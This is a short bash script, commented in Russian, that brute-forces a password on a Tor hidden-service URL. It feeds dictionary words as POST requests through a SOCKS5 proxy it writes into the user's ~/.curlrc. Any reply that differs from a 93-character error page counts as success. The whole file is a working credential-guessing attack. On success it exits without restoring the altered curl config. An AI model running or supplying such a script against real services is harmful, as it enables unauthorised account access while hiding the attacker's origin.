brutter

1. #!/bin/bash
2.  
3. # SYNOPSIS:
4. #   ./brutter.sh <DICTIONARY> ...
5. ##################################
6.  
7. URL=http://ninoetevzx2irhgj.onion/lab/  # Наша цель
8. WORDLIST=(`cat $@`)                     # Список паролей (можно задать несколько словарей)
9. CURLRC="${HOME}/.curlrc"                # Путь к конфигу cURL
10.  
11. # cURL должна быть настроена на Tor при помощи конфига
12. # Запилить настройку через опцию -socks5 почему-то не получилось
13. if [ -f "$CURLRC" ]; then
14.     cp $CURLRC "${CURLRC}.old"
15. fi
16. echo 'proxy = socks5h://127.0.0.1:9050' >> $CURLRC
17.  
18. # Перебираем пароли
19. for PASSWORD in ${WORDLIST[@]}; do
20.     # Посылаем POST-запрос через Tor
21.     REPLY=`curl -# -d "s: ${PASSWORD}" $URL | awk '{print $1}' | wc -c`
22.     # Длина видимого ответа при ошибке 405 - 93 символа
23.     # Костыль такой костыль
24.     if [ "$REPLY" != "93" ]; then
25.         # Если сервер ответил что-то другое, то мы предполагаем,
26.         # что пароль найден
27.         echo $PASSWORD
28.         exit 0
29.     fi
30. done
31.  
32. # Восстанавливаем оригинальный .curlrc, если он существовал
33. rm $CURLRC
34. if [ -f "${CURLRC}.old" ]; then
35.     mv "${CURLRC}.old" $CURLRC
36. fi